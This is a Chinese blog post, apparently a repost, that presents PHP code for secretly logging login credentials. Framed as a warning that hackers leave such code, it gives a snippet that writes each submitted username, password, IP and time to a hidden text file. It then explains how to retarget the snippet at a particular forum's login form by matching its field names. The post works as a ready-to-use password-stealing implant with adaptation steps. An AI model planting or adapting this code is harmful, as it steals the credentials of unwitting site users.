zoukankan      html  css  js  c++  java
  • php截取后台登陆密码的代码

    php截取后台登陆密码的代码,很多时候黑客留了这样的代码,大家一定要注意下if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮
    $sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb
    fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件


    下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。

    我只复制了关键代码过来.


    <form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。

    。。。。强大的省略号。。。。。。

    <TR>
    <TD height=40>账号(<U>U</U>):<BR>
    <INPUT
    class=input id=pwuser accessKey=u size=16
    name=pwuser> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwuser]

    <TR>
    <TD height=40>密 码(<U>P</U>):<BR><INPUT
    class=input id=pwpwd accessKey=p
    type=password size=16 name=pwpwd> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwpwd]

  • 相关阅读:
    api示例
    Windows+Ubuntu文件互传
    UI
    事件
    插件开发入门
    文摘
    刘海屏适配
    APT
    热修复
    进程保活
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154616.html
Copyright © 2011-2022 走看看